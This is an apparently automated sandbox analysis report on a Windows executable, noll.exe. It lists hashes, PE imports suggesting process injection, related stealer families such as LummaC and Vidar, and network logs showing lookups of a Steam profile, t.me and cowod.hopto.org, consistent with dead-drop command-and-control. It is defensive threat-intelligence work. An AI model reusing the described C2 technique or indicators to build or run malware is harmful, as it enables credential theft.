HCA Information:	Successful, ratio: 100% Number of executed functions: 48 Number of non-executed functions: 103
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: noll.exe

Simulations

Behavior and APIs

Time	Type	Description
05:37:36	API Interceptor	1x Sleep call for process: noll.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.55.153.106	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse
	ardware-v1.exe	Get hash	malicious	LummaC	Browse
	ardware-v1.exe	Get hash	malicious	LummaC	Browse
	sNWQ2gC6if.exe	Get hash	malicious	LummaC	Browse
	66DJ2wErLz.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	Setup.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	69633f.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	dZKPE9gotO.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	nB52P46OJD.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.99
	njrtdhadawt.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	T0x859fNfn.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, Vidar, Xmrig	Browse	149.154.167.99
	https://zde.soundestlink.com/ce/c/675fab7ba82aca38b8d991e6/675fabf585cd17d1e3e2bb78/675fac13057112d43b540576?signature=da009f44f7cd45aeae4fbb5addf15ac91fbf725bb5e9405183f25bf1db8c8baa	Get hash	malicious	Unknown	Browse	104.26.10.61
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	149.154.167.99
steamcommunity.com	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	sNWQ2gC6if.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	66DJ2wErLz.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Xmrig	Browse	104.102.49.254
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.121.10.34
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.121.10.34

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FileScanner.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220
	Setup.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
AKAMAI-ASN1EU	1fxm3u0d.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	2kudv4ea.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	23.44.201.32
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	23.218.93.195
	ardware-v1.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	23.43.121.120
	https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3D	Get hash	malicious	Unknown	Browse	104.116.245.16
	https://walli.shanga.co/image/view/?id=1375	Get hash	malicious	Unknown	Browse	172.232.25.148
	jew.mips.elf	Get hash	malicious	Unknown	Browse	172.235.101.204

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	23.55.153.106 149.154.167.99
	duyba.lnk.download.lnk	Get hash	malicious	Unknown	Browse	23.55.153.106 149.154.167.99
	5j0fix05fy.js	Get hash	malicious	NetSupport RAT	Browse	23.55.153.106 149.154.167.99
	Setup.msi	Get hash	malicious	Vidar	Browse	23.55.153.106 149.154.167.99
	htkeUc1zJ0.exe	Get hash	malicious	Unknown	Browse	23.55.153.106 149.154.167.99
	67618a47ee8c5.vbs	Get hash	malicious	Mint Stealer	Browse	23.55.153.106 149.154.167.99
	PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta	Get hash	malicious	Mint Stealer	Browse	23.55.153.106 149.154.167.99
	BBVA S.A..vbs	Get hash	malicious	Remcos	Browse	23.55.153.106 149.154.167.99
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	23.55.153.106 149.154.167.99

Process:	C:\Users\user\Desktop\noll.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3254)
Category:	dropped
Size (bytes):	35483
Entropy (8bit):	5.363548319516386
Encrypted:	false
SSDEEP:	768:I5pq/Ku4fmBC5ReOpfbzQlFNaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYM2n:I58/Ku4fmBC5ReOpfbaNaXfsW9l+X9hi
MD5:	2AFE6A240F8C1D0651BD26C5B4A0CEE6
SHA1:	1E4F06B0FEA11019CA5933CA351790E4B7690998
SHA-256:	B9EBF2EDE460807493E75D5576C736323BD815257FA2237C31D0EBC0277AD219
SHA-512:	947F53908AD2A75B072265CADC5B56C443A822BD86BCD9B6C26313801FC885BC9B37C7F3666783AA202E4D2D278505F1D9D139FE1CE528EF384206AB7C9863AA
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: empty</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&l=english&_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&_

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Users\user\Desktop\noll.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn:n
MD5:	A6E2808F056135D60224752DA9008CA5
SHA1:	F5692F744E5B853B26F260CEEB3F19033EA2B731
SHA-256:	59FFEA4DC5A1A4383C2B0AA9F6DC51E84D688CCD166870128C536E47F33FE088
SHA-512:	6029C52F964064D661268BBA8923F240A941A16587A87775929ED45AF8FB668556D2E22599A0A7B7FBC9406199A3C6D891AF124A34C1ADFD59810E0329F88463
Malicious:	false
Reputation:	low
Preview:	BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.485311356507659
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	noll.exe
File size:	393'216 bytes
MD5:	d78f753a16d17675fb2af71d58d479b0
SHA1:	71bfc274f7c5788b67f7cfae31be255a63dcf609
SHA256:	ad9c40c2644ff83e0edbc367c6e62be98c9632157433108c03379351fe7aeca5
SHA512:	60f4ebe4226fae95f6f1767d6f5fff99f69a126f0c827384c51745c512f495b001051d4273ca23bc177ec2c0511ec7f9ae384e3a5e88e29ce278ac45a55a39b8
SSDEEP:	6144:elqPvKpKJNJGyRlyY8aSp0Vbux0R4kF/Y/o8+:emRJNMalyjaO0Ix6BY/s
TLSH:	80848D1623A030F7E2234575BA454322CBA7B8341661F75FABC405699FFA6C1EE2C71B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?d.]^..]^..]^..2(..E^..2(..R^..2(..b^..T&..X^..T&..M^...'..^^..]^...^..2(..M^..2(..\^..Rich]^..........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4184ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F9E368 [Sun Sep 29 23:31:52 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	118187c3a5a9d853faf932e2bfb655fe

Entrypoint Preview

Instruction
je 00007FD18CE44025h
jne 00007FD18CE44023h
mov eax, FEA6B0E8h
push dword ptr [ebx+eax+75h]
add dword ptr [eax+000181E8h], edi
add byte ptr [ebx+eax+75h], dh
add dword ptr [eax-0173DB18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01725118h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01725B18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01726518h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01706918h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01727918h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01728318h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01728D18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01707918h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-0172A118h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-0172AB18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-0172B518h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-01704A18h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-0172C918h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-0172D318h], edi
push dword ptr [ebx+eax+75h]
add dword ptr [eax-0172DD18h], edi
jmp far eax
call dword ptr [eax+0374FFFEh]
jne 00007FD18CE44023h
mov eax, FE8D13E8h
push dword ptr [ebx+eax+75h]
add dword ptr [eax+00000000h], edi

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3bb80	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x270000	0xb0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x271000	0x3340	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30000	0x290	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2e2b4	0x2e400	5e1e159009c41d9f233e2d4596ec701b	False	0.5120988175675676	Matlab v4 mat-file (little endian) , numeric, rows 4387467, columns 4387480	6.455831500975683	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x30000	0xc99e	0xca00	0285621fb8fcec630d03a8911453d24e	False	0.6049659653465347	data	6.367317298528931	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x23226c	0x20200	1217b4eb11dab4db3583f64f37447efa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x270000	0xb0	0x200	4b7115c48fa1ed45d7fd2da2c2df5abb	False	0.279296875	data	4.097217764488071	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x271000	0x49b2	0x4a00	74336b5e1e990d510dead9e0bdbdad32	False	0.5687816722972973	data	5.49190569334322	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x270058	0x56	ASCII text, with CRLF line terminators	English	United States	1.0232558139534884

Imports

DLL	Import
msvcrt.dll	strncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, memchr, strcpy_s, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
KERNEL32.dll	GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, SetHandleCount, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, GetCPInfo, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetACP, GetCurrentThreadId, SetLastError, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, VirtualAllocEx, GetStringTypeW, InterlockedIncrement, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, TlsSetValue, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, RtlUnwind, HeapCreate
USER32.dll	GetDesktopWindow, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
GDI32.dll	CreateDCA, GetDeviceCaps
ADVAPI32.dll	RegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
SHELL32.dll	SHFileOperationA
ole32.dll	CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear, VariantInit
SHLWAPI.dll

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:37:33.550920963 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:33.550981045 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:33.551062107 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:33.560724974 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:33.560746908 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:34.947391987 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:34.947552919 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.000365019 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.000395060 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.000736952 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.004609108 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.006588936 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.047333956 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.748936892 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.748975039 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.748992920 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.749037981 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.749062061 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.749095917 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.749125957 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.882539034 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.882582903 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.882633924 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.882661104 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.882671118 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.882707119 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.907700062 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.907773018 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.907788992 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.907795906 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:35.907823086 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.907855988 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.908523083 CET	49713	443	192.168.2.5	23.55.153.106
Dec 18, 2024 11:37:35.908539057 CET	443	49713	23.55.153.106	192.168.2.5
Dec 18, 2024 11:37:36.063746929 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:36.063782930 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:36.063853025 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:36.064194918 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:36.064203978 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.426369905 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.426515102 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:37.443229914 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:37.443258047 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.443605900 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.443813086 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:37.444364071 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:37.487329006 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.965585947 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.965614080 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.965655088 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.965691090 CET	443	49725	149.154.167.99	192.168.2.5
Dec 18, 2024 11:37:37.965723991 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:37.965794086 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:37.967705965 CET	49725	443	192.168.2.5	149.154.167.99
Dec 18, 2024 11:37:37.967740059 CET	443	49725	149.154.167.99	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 11:37:33.407300949 CET	52282	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:37:33.545152903 CET	53	52282	1.1.1.1	192.168.2.5
Dec 18, 2024 11:37:35.925756931 CET	62973	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:37:36.062803030 CET	53	62973	1.1.1.1	192.168.2.5
Dec 18, 2024 11:37:38.337723970 CET	56544	53	192.168.2.5	1.1.1.1
Dec 18, 2024 11:37:38.557816029 CET	53	56544	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 11:37:33.407300949 CET	192.168.2.5	1.1.1.1	0xf55	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:37:35.925756931 CET	192.168.2.5	1.1.1.1	0x65a	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:37:38.337723970 CET	192.168.2.5	1.1.1.1	0x2603	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 11:37:33.545152903 CET	1.1.1.1	192.168.2.5	0xf55	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 18, 2024 11:37:36.062803030 CET	1.1.1.1	192.168.2.5	0x65a	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

t.me

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	23.55.153.106	443	3636	C:\Users\user\Desktop\noll.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:37:34 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 10:37:35 UTC	1917	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com 